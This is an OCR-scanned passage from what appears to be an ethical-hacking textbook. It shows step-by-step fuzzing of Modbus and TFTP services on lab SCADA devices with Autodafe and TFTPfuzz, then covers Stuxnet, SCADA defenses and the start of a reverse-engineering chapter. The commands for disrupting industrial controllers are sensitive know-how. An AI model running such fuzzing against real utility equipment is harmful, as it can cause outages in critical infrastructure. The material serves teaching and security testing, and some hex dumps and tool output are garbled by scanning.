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"DNP3 Overview" (Triangle MicroWorks, Inc.) www.trianglemicroworks.com/ 
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WhatIsOPC.html#notel 
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SCADA Fuzzing 

SCADA devices are prone to the same common vulnerabilities — such as enumeration, 
password cracking, network eavesdropping, and denial of service — that are found in 
any other types of network devices. Although these attacks may not be considered so- 
phisticated, you would be amazed at how effective they still are. And you must keep in 
mind that attacks do evolve. They may become more strategic or even scientific, and this 
is where the principles of fuzzing can be applied. 



SCADA Fuzzing with Autodafe 

As mentioned in previous chapters, fuzzing provides an intelligent approach to inject- 
ing irregular message content and data inputs in an effort to qualify the robustness of a 
system. To demonstrate the remarkable capabilities of SCADA fuzzing, this section 
introduces you to the Autodafe fuzzing framework, written by Martin Vuagnoux. Selec- 
tion was based on its unique ability to handle byte-oriented protocols, its quick setup 
time, its relative ease of use, its creative mutation mechanisms, and, most importantly, 
its block-based approach for protocol modeling. 

Before you get started with the Autodafe fuzzing framework, you need the Back- 
Track 4 Linux Security Distro. Additionally, our test bed will have one PC laptop and 
one voltage regulator as our SCADA edge device connected to a private network. The 
need for a voltage regulator is not required, but is used as a means to document live 
behavior for our test method example. 




NOTE The name of the voltage regulator vendor will not be discussed nor 
documented. 



Installing the Autodafe Fuzzing Framework 

The following steps to install the Autodafe fuzzing framework assume that BackTrack 4 
has been previously installed and configured with network access enabled. 

1. Download Autodafe from either Packet Storm (http://packetstormsecurity.org/ 
se a rc h / ? q = a u t o d a fe ) or Sourceforge (http://autodafe.sourceforge.net/). It is 
recommended that you place the Autodafe gunzip file in the /pentest/fuzzers 
directory. 

2. Gunzip and untar Autodafe by issuing the following command: tar -zxvf 
Autodafe-O. l.tar.gz. 

3. BackTrack 4 has most of the library dependencies built in. There is one 
mandatory library that you need, though, called bison. From a command 
line, enter the following command to install bison: apt-get install bison. 
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4. Download from the blog An Autonomous Zone (http://anautonomouszone 
.com/blog/tools) the hex generator script for Autodafe. Place it in the 
autodafe/tools directory. You can rename the generator, sh file to generator 
,sh_old and rename the newly downloaded file from generator_w_hex.sh 
to generator. sh. 

5. Proceed in compiling the Autodafe fuzzing framework, cd to the Autodafe 
directory at /pentest/fuzzers/Autodafe/src/ autodafe and vi the (file.c) source. 
You need to comment out a few lines to alleviate some compile problems that 
have been found: 



NOTE You have the capability of updating BackTrack 4 by performing 
apt-get update and apt-get upgrade, but this is not necessary for this 
procedure. You must also consider the size of persistence that you have 
available on your USB key. 



I * * 

* NAME: check_directory 

* DESC: check if filename is a directory 

* RETN: 0 if ok 

* -1 if error 

* * j 

int check_directory (conf ig *conf) { 
struct stat *st = NULL; 

/* debug */ 

debug (1, "< [enter ]\n"); 

/* check the length of the directory - useless but . . . 
if (strlen (conf->fuzz_f ile_dir ) >= PATH_MAX - 16) { 

error_ ("error path too long\n"); 
error_ ("QUITTING! \n") ; 
return -1; 

}*/ 

6. cd back to /pentest/fuzzers/Autodafe directory and run the configuration 
script by typing ./configure. 

7. Once the configuration script has run and checked for its dependencies, type 
the command make. 

8. Type the command make install. 

You should now be ready to play with the Autodafe framework. 

Dissecting the Modbus (mbtcp) Protocol 

Thank goodness for the power of the Internet. Instead of having to generate our own 
Modbus messages (or most any other messages, for that matter), we can utilize network 
capture files that were previously captured. There are several websites that offer packet 
captures for the very purpose of learning about the inner workings of the protocol itself. 
A few websites that provide a wealth of network capture information are Pcapr from 
Mu Dynamics (http://pcapr.net/) and SampleCaptures from Wireshark (http://wiki 
.wireshark.org/SampleCaptures). The Pcapr site requires registration, but sign up is 
quick and painless. 
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In this example, the Modbus message that is of interest to us is a query request for 
a Write single register using function code 06. We chose this message to test because it 
is the message that allows us to perform either a raise- or lower-voltage function when 
using a voltage regulator as our SCADA edge device. 



1. Capture from SampleCaptures or Pcapr a Modbus Write single register using 
function code 06 packet with Wireshark. 



2. Once the packet trace has been captured or downloaded, export the packet 
capture to PDML (Packet Details Markup Language) within Wireshark by 
selecting File | Export | As XML - "PDML" (Packet Details) File and save it 
within your Autodafe directory. 



3. Use the PDML2AD utility to convert the PDML file to Autodafe's script 
language. The syntax is as follows: 

pdml2ad -v -p modbus_query_write . pdml modbus_query_write . ad 




NOTE The PDML2AD tool has a help menu that is accessible by typing 
pdml2ad -h. Otherwise, -v stands for verbose and -p stands for recover 
protocol. 



4. Take a look at the parsed file by typing cat modbus_query_write.ad: 



j -k -k 

* xml Autodafe's parser v.0.1 (c) Martin Vuagnoux - 2004-2006 * 

* auto-generated script using PDML (Packet Details Markup Language) source * 




block_begin ("packet_l .6.54 .mbtcp") ; 

// name : modbus_tcp . trans_id 
// showname: transaction identifier: 0 
// show : 0 
// size: 0x2 (2) 

hex ( 

00 00 



// name : modbus_tcp . prot_id 
// showname: protocol identifier: 0 
/ / show : 0 
// size: 0x2 (2) 

hex ( 

00 00 



// name : modbus_tcp . len 
// showname: length: 6 
// show : 6 
// size: 0x2 (2) 

hex ( 

00 06 



// name : modbus_tcp . unit_id 
// showname: unit identifier: 255 
// show : 255 
// size: 0x1 (1) 
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hex ( 
ff 
) ; 

block_begin ("packet_l .6.61.") ; 



/ / name : 


modbus tcp.func code 


// showname: 


function 6: Write singl 


// show : 


6 


// size: Oxl 


(1) 


fuzz hex ( 




0x06 




) r 

/ / name : 


modbus top . ref erence num 


// showname: 


reference number: 7700 


// show : 


7700 


// size: 0x2 


(2) 


hex ( 




Oxle 14 





register 



/ / name : 

// showname: (null) 

// show : Data 
// size: 0x2 (2) 

hex ( 

0x00 01 



block_end ( "packet_l .6.61.") ; 
block_end ("packet_l .6.54 .mbtcp" ) ; 
block_end ( "packet_l " ) ; 
send ( "packet_l" ) ; /* top */ 

In simple terms, we can see that the PDML2AD tool has parsed through the 
PDML export trace, leaving us with blocks of data that we can work with. As 
mentioned previously, let's focus on function 06: Write single register. Fuzz 
this area by changing hex to fuzz_hex as noted and save it. 

5. Compile the modbus_query_write.ad file using the ADC utility: 

adc modbus_query_write . ad modbus_query_write . adc 
[!] block: "packet_l . 6 . 61 . " size: 5 (0x5) 

[!] block: "packet_l . 6 . 54 .mbtcp" size: 12 (Oxc) 

[!] block: "packet_l" size: 12 (Oxc) 




NOTE This test method is using a basic fuzzing approach that does not 
incorporate the Autodafe ADBG debugger. In this example, we are actually 
fuzzing a hardware device that has aTCP/IP stack. If you are fuzzing software, 
it is highly recommended that you use the ADBG utility/debugger since it will 
trace the software program in order to weight the fuzzing attacks. 



6. We are ready to perform some basic fuzzing using the Autodafe utility. The 
Autodafe utility has several command-line functions, but for our test we are 
going to utilize the following commands: 
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NOTE Before you execute the Autodafe command line, make sure you are 
running Wireshark so that you can examine the packets that the Autodafe tool 
is sending and receiving. 



autodafe -v -r 192.168.2.28 -p 502 modbus_query_write . adc 




NOTE The Autodafe tool has a help menu that is accessible by typing 
autodafe -h. Otherwise, -v stands for verbose and -r stands for remote 
host. Also, by default, we are usingTCP for transport. If you needed to use 
UDP, you could use the -u option. 



7 . 



Once the Autodafe tool has been executed, you should see following: 



[ ! ] source 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 
[ ! ] source : 



" /Autodafe /hex/hex-x3F-xlO-256" 
/Autodafe /hex/hex-xl 0-2 5 6 -x20" 
/Autodafe/hex/hex-x20-xl0-256" 
/Autodafe /hex/hex-xl 0-2 5 6 -x40" 
/Autodafe /hex /hex-x40-xl0 -256" 
/Autodafe/hex/hex-xl0-256-x60" 
/Autodafe /hex /hex-x 6 0-xl0 -256" 
/Autodafe /hex /hex-x7 f-xlO-256-xFE " 
/Autodafe /hex/hex-xl 0-65535" 
/Autodaf e/hex/hex-xlO-65535-xFF" 
/Autodafe /hex /hex-xFF-xl 0-65535" 
/Autodaf e/hex/hex-xlO-65535-xFE " 
/Autodaf e/hex/hex-xFE-xl 0-65535" 
/Autodaf e/hex/hex-xl0-65535-x7F" 
/Autodaf e/hex/hex-x7F-xl 0-65535" 
/Autodaf e/hex/hex-xl0-65535-x00" 
/Autodaf e/hex/hex-xOO-xl 0-65535" 
/Autodaf e/hex/hex-xl0-65535-x01 " 

" /Autodafe /hex/hex-x20-xl 0-65535" 
/Autodaf e/hex/hex-xl0-65535-x40" 
/Autodafe /hex /hex-x40-xl 0-65535" 
/Autodaf e/hex/hex-xl0-65535-x60" 
/Autodaf e/hex/hex-x60-xl 0-65535" 
/Autodaf e/hex/hex-x7 f-xlO-65535-xFE 
/Autodafe /hex/hex-xl 0-65536" 



(257 bytes) 

(257 bytes) 

(257 bytes) 

(257 bytes) 

(257 bytes) 

(257 bytes) 

(257 bytes) 

(1 bytes) 

(65535 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 
(65536 bytes) 

" (1 bytes) 

(65536 bytes) 



1] waiting 1 seconds before opening connection... 

[*] connected to: 192.168.2.28 on port: 502 

[*] connected to: 192.168.2.28 on port: 502 

[*] connected to: 192.168.2.28 on port: 502 

[*] connected to: 192.168.2.28 on port: 502 

[*] connected to: 192.168.2.28 on port: 502 

[*] connected to: 192.168.2.28 on port: 502 

[*] connected to: 192.168.2.28 on port: 502 



Autodafe will utilize the hex generator script that we previously installed, and then 
fuzz the variable or variables that we specified using the fuzz_hex expression. As the 
fuzzing test scenarios are taking place, we should see within Wireshark the packets 
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being captured. With that said, let's compare some of the messages. Following is a valid 
mbtcp (Modbus/TCP) Query/Response compared to a bad/fuzzed mbtcp Query/ 
Response that was transmitted and received: 

No. Time Source Destination Protocol Info 

389 18:54:23.228729 192.168.2.20 192.168.2.28 Modbus/TCP query 
[1 pkt(s)]: trans:0; unit: 255, func: 6: Write single register. 

Modbus/TCP 

transaction identifier: 0 
protocol identifier: 0 
length: 6 

unit identifier: 255 
Modbus 



function 6: Write single register 

reference number: 7700 

Data 



0000 


00 


If 


5a 


00 


08 


lc 


00 


23 


8b 


ac 


21 


c9 


08 


00 


45 


00 


. .Z E . 


0010 


00 


34 


08 


42 


40 


00 


40 


06 


37 


54 


0a 


42 


f3 


22 


0a 


42 


.4.B0.0.7T.B." .B 


0020 


f 3 


87 


ae 


75 


01 


f 6 


a2 


35 


64 


b9 


00 


3a 


3d 


99 


50 


18 


. . .u. . .5d. . :=.P. 


0030 


16 


dO 


8b 


72 


00 


00 


00 


00 


00 


00 


00 


06 


ff 


06 


le 


14 





0040 00 01 



No. Time Source Destination Protocol Info 

389 18:54:23.230608 192.168.2.28 192.168.2.20 Modbus/TCP query 
1 pkt(s)]: trans:0; unit: 255, func: 6: Write single register 

Modbus/TCP 

transaction identifier: 0 
protocol identifier: 0 
length: 6 

unit identifier: 255 
Modbus 



function 6: Write single register 

reference number: 7700 
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0040 00 01 

No. Time Source Destination Protocol Info 

1281 18:54:23.983342 192.168.2.20 192.168.2.28 Modbus/TCP query 
[1 pkt(s)]: trans:0; unit: 255, func: 126: Program (584/984). 

Exception returned [Malformed Packet] 

Modbus/TCP 

transaction identifier: 0 
protocol identifier: 0 
length: 6 

unit identifier: 255 
Modbus 

function 126: Program (584/984). Exception: Unknown exception code (255) 

exception code: Unknown (255) 

[Malformed Packet: Modbus/TCP] 

[Expert Info (Error/Malformed) : Malformed Packet (Exception occurred) ] 

[Message: Malformed Packet (Exception occurred)] 

[Severity level: Error] 

[Group: Malformed] 
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No. Time Source Destination Protocol Info 

1284 18:54:23.986705 192.168.2.28 192.168.2.20 Modbus/TCP response 

[1 pkt(s)]: trans:0; unit: 255, func: 126: Program (584/984). 
Exception returned 
Modbus/TCP 

transaction identifier: 0 



protocol identifier: 0 
length: 3 

unit identifier: 255 
Modbus 

function 126: Program (584/984). Exception: 

exception code: Illegal function (1) 

0000 00 23 8b ac 21 c9 00 If 5a 00 08 lc 08 00 45 00 

0010 00 31 96 de 00 00 40 06 e8 ba 0a 42 f3 87 0a 42 

0020 f 3 22 01 f 6 ae f3 00 3a 3d 99 a2 a3 Od 42 50 18 

0030 05 a6 Of 4b 00 00 00 00 00 00 00 03 ff fe 01 
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Now just imagine what we could do if we were to take a harder look at the Modbus 
TCP/IP protocol specification, or any protocol for that matter. We would have an 
immense playground for testability. We don't have to stop at fuzzing the Modbus Write 
single register. We could test every possible Modbus function that is available or 
supported on our system under test (SUT). In fact, let's reflect on what we are trying 
to accomplish: 

• Can we trigger abnormal behavior by sending invalid/nonsupported inputs 
or fuzzed data? The answer is more than likely yes. The example given for 
the device that was tested did not fail under this test scenario, but negative 
impact was accomplished when the fuzzing of other Modbus functions and 
registers was performed. Such impacts that were found would cause the device 
under test to reboot, or cause the network interface to become nonfunctional, 
requiring a manual reset/reboot to place the SCADA device back into working 
operation. 

• What if the malicious user were able to gain access to this type of device and 
replicate the same behaviors? We can't place blame on the Modbus protocol 
alone. The same negative impact could occur with any protocol that has been 
implemented on these SCADA devices that has not gone through a thorough 
security evaluation. In fact, security and quality assurance should be regarded 
as the most critical prerequisite to any research and development program. 



SCADA Fuzzing with TFTP Daemon Fuzzer 

Another interesting fuzzer that caused a brief outage impact to a capacitor bank con- 
troller (CBC) device is called TFTP Daemon Fuzzer. As mentioned previously, the CBC 
device falls into the category of an IED, which is similar to a voltage regulator. The 
fuzzer is a Perl script written by Jeremy Brown. This script tests for response behaviors 
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to TFTP format string, overflow, and other miscellaneous fuzzing bugs. The script is eas- 
ily modifiable and actually teaches the user how to implement and fuzz the TFTP pro- 
tocol. In our test scenario, we connected a CBC device to a private network and then 
used the NMAP utility to identify which ports and services were active on the CBC de- 
vice. Several service ports that were identified as being open were TFTP, HTTP, Telnet, 
and SNMP. The beauty of fuzzing is that all of these services/protocols can be fuzzed/ 
manipulated to determine if some type of error condition could occur. Let's quickly 
take a look at the TFTPfuzz in action. 




NOTE The name of the CBC device vendor will not be discussed nor 
documented. Also, the need for a CBC device is not required, but is used 
as a means to document live behavior for our test method example. 



Installing TFTPfuzz 

To install TFTPfuzz script, follow these steps: 

1. Within BackTrack 4, download and run the TFTPfuzz script. You can 
download TFTPfuzz from Packet Storm (http://packetstormsecurity.org/ 
fuzzer/tftpfuzz.txt). It is recommended that you place the TFTPfuzz script 
in the /pentest/fuzzers directory. 

2. Issue the following commands: mv tftpfuzz.txt tftpfuzz.pl and then 
chmod 777 tftpfuzz.pl. 

3. The TFTPfuzz script will require the Net::TFTP module, written by Graham Barr 
and available at CPAN Search (http://search.cpan.org/~gbarr/Net-TFTP-0.18/ 
TFTP.pm), or the Net::TFTP module can be downloaded manually. 

Executing TFTPfuzz 

1. After you install the Net::TFTP module, execute the TFTP script via the 
following command: 




NOTE Before executing the TFTPfuzz script, make sure you are running 
Wireshark so that you can examine the packets that the TFTPfuzz tool is 
sending and receiving. Also launch a secondary console window to send pings 
to assess whether the system under test fails to respond. 



root@bt : /pentest/fuzzers# perl tftpfuzz.pl -h 192. 168. 2. 2£ 
Fuzzing [TFTP] -> [MODE/GET] STAGE #1 COMPLETE... 

Fuzzing [TFTP] -> [MODE/PUT] STAGE #2 COMPLETE... 

Fuzzing [TFTP] -> [GET/ASCI I /NETASCI I ] STAGE #1 COMPLETE... 
Fuzzing [TFTP] -> [GET/ASCII/OCTET] STAGE #2 COMPLETE... 
Fuzzing [TFTP] -> [GET/BINARY /NETASCI I ] STAGE #3 COMPLETE... 
Fuzzing [TFTP] -> [GET/BINARY/OCTET] STAGE #4 COMPLETE... 
Fuzzing [TFTP] ->[ PUT/ASCI I /NETASCI I ] STAGE #1 COMPLETE... 
Fuzzing [TFTP] -> [PUT/ASCII/OCTET] STAGE #2 COMPLETE... 
Fuzzing [TFTP] -> [ PUT/BINARY /NETASCI I ] STAGE #3 COMPLETE... 
Fuzzing [TFTP] -> [PUT/BINARY/OCTET] STAGE #4 COMPLETE... 
root0bt : /pentest/ fuzzers# 



https://www.facebook.eom/pages/Download-from-harks/1 2420175441 7002 



Chapter 19: SCADA Attacks 

407 



2. Once the script is started, execution is pretty well automated. Let's take a look 
at a TFTP response message that has come back from the CBC device: 



No. Time Source Destination Protocol Info 

10482 0.001609 192.168.2.28 192.168.2.29 TFTP 

Error Code, Code: Access violation. 

Message: Wrong destination file, valid is: X5, or WEB1 - WEB6\000 
Source: 192.168.2.28 (192.168.2.28) 

Destination: 192.168.2.29 (192.168.2.29) 

User Datagram Protocol, Src Port: tftp (69), Dst Port: 51451 (51451) 
Source port: tftp (69) 

Destination port: 51451 (51451) 

Length: 66 

Checksum: 0x862c [validation disabled] 

[Good Checksum: False] 

[Bad Checksum: False] 

Trivial File Transfer Protocol 

[DESTINATION File [truncated] : 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
A AAAAAAAA AA A A A A A A A A A ] 

Opcode: Error Code (5) 

Error code: Access violation (2) 

Error message: Wrong destination file, valid is: X5, or WEB1 - WEB6 
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We can see that the CBC device responded with an access violation error and an 
error message, which is a normal response for the type of message that we are sending. 
The key here is to try every kind of malformed message trigger that we can think of, to 
see if we can cause some sort of abnormality or disruption. Another important concept 
to grasp is that fuzzing is not limited to just SCADA protocols; just about any protocol 
(ASCII or binary) has the potential to be reverse engineered and used for malicious 
intent. 
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Stuxnet Malware (The New Wave in 
Cyberterrorism) 

Just when we thought FUD (fear, uncertainty, and doubt) was just a creative marketing 
technique, W32. Stuxnet emerged as a genuine wakeup call to the fact that cyberterror- 
ism is quite real. This uniquely designed piece of malware is a formidable threat that 
targets SCADA-related systems. It appears that the most probable targets of this notori- 
ous infection were advanced critical infrastructure facilities within Iran, such as nuclear 
installations that utilized Siemens control systems or, more specifically, Siemens PLCs. 
In fact, Symantec claims that approximately 67 percent of the infected systems were in 
Iran alone. 

As documented in the Symantec Security Response W32. Dossier, "Stuxnet is a large, 
complex piece of malware with many different components and functionalities." These 
functionalities consist of self-replication based on zero-day exploits and unpatched 
Microsoft vulnerabilities, antivirus avoidance, network propagation, sophisticated code 
modification, process injection, network fingerprinting methods, and novel use of both 
Windows and PLC rootkits. Never before has such a terrifying foe struck such a nerve as 
critical infrastructure. Some other interesting tidbits about Stuxnet malware are that it 
is upgrade capable through peer-to-peer methods within the LAN, and can avoid instal- 
lation detection through the use of two digitally signed authentic certificates, stolen 
from the certification authorities JMicron and Realtek. 

Although Siemens, Microsoft, and antivirus vendors have potentially contained the 
malware threat through the introduction of Stuxnet removal tools, operating system 
patches, and updated virus/malware definitions, this alone should not be the only 
approach used to protect against SCADA attacks such as Stuxnet. 

References 

Stuxnet www.wikipedia.org/wiki/Stuxnet 

"W32. Stuxnet Dossier" (Nicolas Falliere, Liam O Murchu, and Eric Chien) 

www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/ 

w32stuxnet-dossier.pdf 

How to Protect Against SCADA Attacks 

Although you can't know about and detect all vulnerabilities in advance of deploy- 
ment, you certainly can be proactive in mitigating the potential of a SCADA security 
breach by taking the following defense-in-depth methods into consideration: 

• Develop a security policy. 

• Implement ACLs (access control lists). 

• Use MAC address filtering. 

• Use VLAN segmentation. 
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• Physically secure SCADA devices, including alarm and tamper management. 

• Disallow the use of third-party USB and related memory sticks. 

• Adhere to publications, guides, and standards, such as NERC Critical 
Infrastructure Protection (CIP) standards; NIST Special Publications 800 
Series; IASE guidance; Security Technical Implementation Guides (STIGs); 
Advanced Metering Infrastructure Security (AMI-SEC) documents; and 
NISTIR 7628, Guidelines for Smart Grid Cyber Security: Vol. 1, Smart Grid 
Security Strategy, Architecture, and High-Level Requirements. 

• Implement an IDS/IPS that supports SCADA protocol protection mechanisms. 

• If a dial-up modem is utilized, implement enhanced security that supports 
activity logging, encryption, name and password authentication. 

• Incorporate OS and firmware upgrades (including patch maintenance). 

• Utilize protective protocols such as SSH, DNPsec, TLS, DTLS, SSL, PKI, and 
IPsec, if possible. 

• Implement strong encryption capabilities. 

• Implement a Security Information and Event Management (SIEM) system for 
log aggregation, log review, and audit analysis. 

• Implement a scalable edge network strategy for all applicable firewalls, 
switches, routers, and IPS and IDS devices. 

• Confirm and ensure policies are in place for two- and three-factor 
authentication. 

• Ensure scheduled internal security assessments are routinely performed. 

Reference 

"Security Considerations in SCADA Communication Protocols" (James Graham and 

Sandip Patel) www.cs.louisville.edu/facilities/ISLab/tech%20papers/ISRL-04-01.pdf 
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What is reverse engineering? At the highest level, it is simply taking a product apart to 
understand how it works. You might do this for many reasons, among them are to 

• Understand the capabilities of the product's manufacturer 

• Understand the functions of the product in order to create compatible 
components 

• Determine whether vulnerabilities exist in a product 

• Determine whether an application contains any undocumented functionality 

Many different tools and techniques have been developed for reverse engineering 
software. We focus in this chapter on those tools and techniques that are most helpful 
in revealing flaws in software. We discuss static (also called passive ) reverse engineering 
techniques in which you attempt to discover potential flaws and vulnerabilities simply 
by examining source or compiled code. In the following chapters, we will discuss more 
active means of locating software problems and how to determine whether those prob- 
lems can be exploited. 

We address the following reverse engineering topics in this chapter: 

• Ethical reverse engineering 

• Why bother with reverse engineering? 

• Source code analysis 

• Binary analysis 

Ethical Reverse Engineering 

Where does reverse engineering fit in for the ethical hacker? Reverse engineering is of- 
ten viewed as the craft of the cracker who uses her skills to remove copy protection from 
software or media. As a result, you might be hesitant to undertake any reverse engineer- 
ing effort. The Digital Millennium Copyright Act (DMCA) is often brought up when- 
ever reverse engineering of software is discussed. In fact, reverse engineering is addressed 
specifically in the anti-circumvention provisions of the DMCA (section 1201(f)). We 
will not debate the merits of the DMCA here, but will note that there continue to be 
instances in which it is wielded to prevent publication of security-related information 
obtained through the reverse engineering process (see the following "References" sec- 
tion). It is worth remembering that exploiting a buffer overflow in a network server is a 
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bit different from cracking a digital rights management (DRM) scheme protecting an 
MP3 file. You can reasonably argue that the first situation steers clear of the DMCA 
while the second lands right in the middle of it. 

When dealing with copyrighted works, two sections of the DMCA are of primary 
concern to the ethical hacker, sections 1201(f) and 1 201 (j) . Section 1201(f) addresses 
reverse engineering in the context of learning how to interoperate with existing soft- 
ware, which is not what you are after in a typical vulnerability assessment. Section 
1201 (j) addresses security testing and relates more closely to the ethical hacker's mis- 
sion in that it becomes relevant when you are reverse engineering an access control 
mechanism. The essential point is that you are allowed to conduct such research as long 
as you have the permission of the owner of the subject system and you are acting in 
good faith to discover and secure potential vulnerabilities. Refer to Chapter 2 for a 
more detailed discussion of the DMCA. 

References 

Digital Millennium Copyright Act (DMCA) 

en.wikipedia.org/wiki/Digital_Millennium_Copyright_Act 

DMCA-related legal cases and resources (Electronic Frontier Foundation) 

w2.eff.org/IP/DMCA/ 

Why Bother with Reverse Engineering? 

With all the other techniques covered in this book, why would you ever want to resort 
to something as tedious as reverse engineering? You should be interested in reverse 
engineering if you want to extend your vulnerability assessment skills beyond the use 
of the pen tester's standard bag of tricks. It doesn't take a rocket scientist to run Nessus 
and report its output. Unfortunately, such tools can only report on what they know. 
They can't report on undiscovered vulnerabilities, and that is where your skills as a re- 
verse engineer come into play. 

If you want to move beyond the standard features of Canvas or Metasploit and learn 
how to extend them effectively, you will probably want to develop at least some rudi- 
mentary reverse engineering skills. Vulnerability researchers use a variety of reverse en- 
gineering techniques to find new vulnerabilities in existing software. You may be 
content to wait for the security community at large to discover and publicize vulnera- 
bilities for the more common software components that your pen-test client happens 
to use. But who is doing the work to discover problems with the custom, web-enabled 
payroll application that Joe Coder in the accounting department developed and de- 
ployed to save the company money? Possessing some reverse engineering skills will pay 
big dividends whether you want to conduct a more detailed analysis of popular soft- 
ware, or whether you encounter those custom applications that some organizations 
insist on running. 
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Reverse Engineering Considerations 

Vulnerabilities exist in software for any number of reasons. Some people would say that 
they all stem from programmer incompetence. While there are those who have never 
seen a compiler error, let he who has never dereferenced a null pointer cast the first 
stone. In actuality, the reasons are far more varied and may include 

• Failure to check for error conditions 

• Poor understanding of function behaviors 

• Poorly designed protocols 

• Improper testing for boundary conditions 




CAUTION Uninitialized pointers contain unknown data. Null pointers have 
been initialized to point to nothing so that they are in a known state. In 
Cl C++ programs, attempting to access data (dereferencing) through either 
usually causes a program to crash or, at minimum, causes unpredictable 
behavior. 



As long as you can examine a piece of software, you can look for problems such as 
those just listed. How easy it will be to find those problems depends on a number of 
factors: 

• Do you have access to the source code for the software? If so, the job of 
finding vulnerabilities may be easier because source code is far easier to read 
than compiled code. 



• How much source code is there? Complex software consisting of thousands 
(perhaps tens of thousands) of lines of code will require significantly more 
time to analyze than smaller, simpler pieces of software. 

• What tools are available to help you automate some or all of this source code 
analysis? 

• What is your level of expertise in a given programming language? 

• Are you familiar with common problem areas for a given language? 



• What happens when source code is not available and you only have access to 
a compiled binary? 

• Do you have tools to help you make sense of the executable file? Tools such 
as disassemblers and decompilers can drastically reduce the amount of time it 
takes to audit a binary file. 



In the remainder of this chapter, we will answer all of these questions and attempt 
to familiarize you with some of the reverse engineer's tools of the trade. 
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Source Code Analysis 

If you are fortunate enough to have access to an application's source code, the job of 
reverse engineering the application will be much easier. Make no mistake, it will still be 
a long and laborious process to understand exactly how the application accomplishes 
each of its tasks, but it should be easier than tackling the corresponding application 
binary. A number of tools exist that attempt to automatically scan source code for 
known poor programming practices. These can be particularly useful for larger applica- 
tions. Just remember that automated tools tend to catch common cases and provide no 
guarantee that an application is secure. 



Source Code Auditing Tools 

Many source code auditing tools are freely available on the Internet. Some of the more 
common ones include ITS4, RATS (Rough Auditing Tool for Security), Flawfmder, and 
Splint (Secure Programming Lint). Microsoft now offers its PREfast tool as part of its 
Visual Studio 2005 Team Edition, or with the freely downloadable Windows 2003 Driv- 
er Kit (WDK). On the commercial side, several vendors offer dedicated source code 
auditing tools that integrate into several common development environments such as 
Eclipse and Visual Studio. The commercial tools range in price from several thousand 
dollars to tens of thousands of dollars. 

ITS4, RATS, and Flawfmder all operate in a fairly similar manner. Each one consults 
a database of poor programming practices and lists all of the danger areas found in 
scanned programs. In addition to known insecure functions, RATS and Flawfmder re- 
port on the use of stack allocated buffers and cryptographic functions known to incor- 
porate poor randomness. RATS alone has the added capability that it can scan Perl, 
PHP, and Python code, as well as C code. 

For demonstration purposes, we will take a look at a file named find.c, which im- 
plements a UDP-based remote file location service. We will take a closer look at the 
source code for find.c later. For the time being, let's start off by running find.c through 
RATS. Here we ask RATS to list input functions, output only default and high-severity 
warnings, and use a vulnerability database named rats-c.xml: 

# ./rats -i -w 1 -d rats-c.xml find.c 
Entries in c database: 310 
Analyzing find.c 
find.c:46: High: vfprintf 

Check to be sure that the non-constant format string passed as argument 2 to 
this function call does not come from an untrusted source that could have 
added formatting characters that the code is not prepared to handle. 

find.c: 119: High: fixed size local buffer 
find.c: 164: High: fixed size local buffer 
find.c: 165: High: fixed size local buffer 
find.c: 166: High: fixed size local buffer 
find.c: 167: High: fixed size local buffer 
find.c: 172: High: fixed size local buffer 
find.c: 179: High: fixed size local buffer 
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find.c:547: High: fixed size local buffer 

Extra care should be taken to ensure that character arrays that are allocated 
on the stack are used safely. They are prime targets for buffer overflow 
attacks . 

find.c:122: High: sprintf 
find.c:513: High: sprintf 

Check to be sure that the format string passed as argument 2 to this function 
call does not come from an untrusted source that could have added formatting 
characters that the code is not prepared to handle. Additionally, the format 
string could contain '%s' without precision that could result in a buffer 
overflow . 

find.c:524: High: system 

Argument 1 to this function call should be checked to ensure that it does not 
come from an untrusted source without first verifying that it contains 
nothing dangerous . 

P : \010Comp\All-In-l\568-l\chl2 . vp 
Friday, November 23, 2007 5:19:23 PM 
find.c: 610: recvfrom 

Double check to be sure that all input accepted from an external data source 
does not exceed the limits of the variable being used to hold it. Also make 
sure that the input cannot be used in such a manner as to alter your 
program ' s 

behavior in an undesirable way. 

Total lines analyzed: 638 
Total time 0.000859 seconds 
742724 lines per second 

Here, RATS informs us about a number of stack allocated buffers and points to a 
couple of function calls for further, manual investigation. Fixing these problems gener- 
ally is easier than determining if they are exploitable and under what circumstances. 
For find.c, it turns out that exploitable vulnerabilities exist at both sprintfQ calls, and 
the buffer declared at line 172 can be overflowed with a properly formatted input pack- 
et. However, there is no guarantee that all potentially exploitable code will be located 
by such tools. For larger programs, the number of false positives increases and the use- 
fulness of the tool for locating vulnerabilities decreases. It is left to the tenacity of the 
auditor to run down all of the potential problems. 

Splint is a derivative of the C semantic checker Lint, and as such generates signifi- 
cantly more information than any of the other tools. Splint will point out many types 
of programming problems, such as use of uninitialized variables, type mismatches, 
potential memory leaks, use of typically insecure functions, and failure to check func- 
tion return values. 




CAUTION Many programming languages allow the programmer to ignore 
the values returned by functions. This is a dangerous practice because function 
return values are often used to indicate error conditions. Assuming that all 
functions complete successfully is another common programming problem 
that leads to crashes. 
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In scanning for security-related problems, the major difference between Splint and 
the other free tools is that Splint recognizes specially formatted comments embedded 
in the source fdes that it scans. Programmers can use Splint comments to convey infor- 
mation to Splint concerning things such as pre- and postconditions for function calls. 
While these comments are not required for Splint to perform an analysis, their presence 
can improve the accuracy of Splint's checks. Splint recognizes a large number of com- 
mand-line options that can turn off the output of various classes of errors. If you are 
interested in strictly security-related issues, you may need to use several options to cut 
down on the size of Splint's output. 

Microsoft's PREfast tool has the advantage of very tight integration within the 
Visual Studio suite. Enabling the use of PREfast for all software builds is a simple matter 
